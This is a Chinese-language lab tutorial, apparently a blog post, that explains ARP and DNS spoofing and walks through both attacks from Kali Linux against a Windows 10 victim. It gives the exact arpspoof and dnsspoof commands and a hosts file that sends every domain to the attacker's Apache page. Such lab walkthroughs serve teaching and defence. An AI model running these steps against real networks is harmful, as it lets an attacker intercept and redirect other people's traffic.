ARP Spoof 攻击 与 DNS Spoof 攻击

ARP Spoof 攻击

透过更改靶机(victim)的ARP封包(IP)位址,使得靶机回传给路由器(Router)的封包会直接回传给攻击者

此攻击又称为中间人攻击(man in the middle)

DNS Spoof 攻击

跟 ARP 一样,DNS 纪录如果被攻击,当使用者连上这个网站时

就会根据事先设定好的规则转发网站,所以不管浏览何种网站都会被强制导向到攻击者设定的网站

前置作业

Kali Linux (攻击者)

Windows (靶机)

攻击实作 (ARP Spoof)

确认靶机 IP 位址以及路由器位址,开启 CMD 输入以下指令

ipconfig
IPv4 位址栏位即为 IP 位址,预设匣道即为路由器位址

输入以下指令确认 ARP 路由表

arp -a
确认靶机原本的 MAC 位址为 b0-fa-eb-10-f3-47

回到攻击端(Kali)开启终端机

首先进入 root 权限

su -

输入以下指令确定网卡介面名称

ifconfig
红框处 eth0 即为网卡介面名称

输入以下指令,开始对Windows10(靶机) 执行攻击

arpspoof -i eth0 -t 10.16.3.12 -r 10.16.3.126
         (监听网卡)   (靶机IP)     (路由器位址)
出现此画面即表示攻击中,按下 Ctrl + C 可以停止

回到Windows10(靶机),输入以下指令确认路由表

arp -a
确认路由表已变更

尝试连上网际网路,确认无法上网

攻击实作 (DNS Spoof)

首先持续 ARP 攻击,并且开启新的终端机,新增 dns.txt 并且编辑

nano dns.txt

加入以下指令并储存档案

10.16.3.44 *.*.*
(攻击者IP)

开启 apache 伺服器制作导向的网页

/etc/init.d/apache2 start

输入以下指令开始执行 DNS Spoof 攻击

dnsspoof -i eth0 -f dns.txt
攻击中

此时请开启Windows10(靶机)的浏览器随便浏览网页
会发现都被导向到我们设定的网页,表示攻击成功

SHXJ
Latest posts by SHXJ (see all)

发布留言